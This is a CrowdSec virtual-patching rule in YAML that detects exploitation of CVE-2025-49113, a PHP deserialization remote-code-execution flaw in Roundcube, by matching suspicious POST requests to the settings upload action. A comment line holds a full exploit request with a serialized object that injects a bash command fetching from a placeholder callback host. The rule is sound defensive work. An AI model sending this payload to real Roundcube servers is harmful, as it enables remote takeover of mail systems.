1name: crowdsecurity/vpatch-CVE-2025-49113
2description: 'Detects arbitrary remote code execution vulnerability via PHP Object Deserialization in Roundcube'
3#POST /?_task=settings&_framed=1&_remote=1&_from=!";O:16:"Crypt_GPG_Engine":1:{s:8:"_gpgconf";s:{{44 + len(oast_new)}}:"bash+-c+"printf+'curl+{{oast_new}}'>/tmp/p;bash+/tmp/p";";}}&_action=upload 
4rules:
5  - and:
6      - zones:
7          - METHOD
8        match:
9          type: equals
10          value: POST
11      - zones:
12          - ARGS
13        variables:
14          - _task
15        transform:
16          - urldecode
17          - lowercase
18        match:
19          type: equals
20          value: 'settings'
21      - zones:
22          - ARGS
23        variables:
24          - _action
25        transform:
26          - urldecode
27          - lowercase
28        match:
29          type: equals
30          value: 'upload'
31      - zones:
32          - ARGS
33        variables:
34          - _from
35        transform:
36          - urldecode
37          - lowercase
38        match:
39          type: regex
40          value: "[^\\w.-]"
41
42labels:
43  type: exploit
44  service: http
45  confidence: 3
46  spoofable: 0
47  behavior: 'http:exploit'
48  label: "Roundcube - RCE"
49  classification:
50    - cve.CVE-2025-49113
51    - attack.T1190
52    - cwe.CWE-502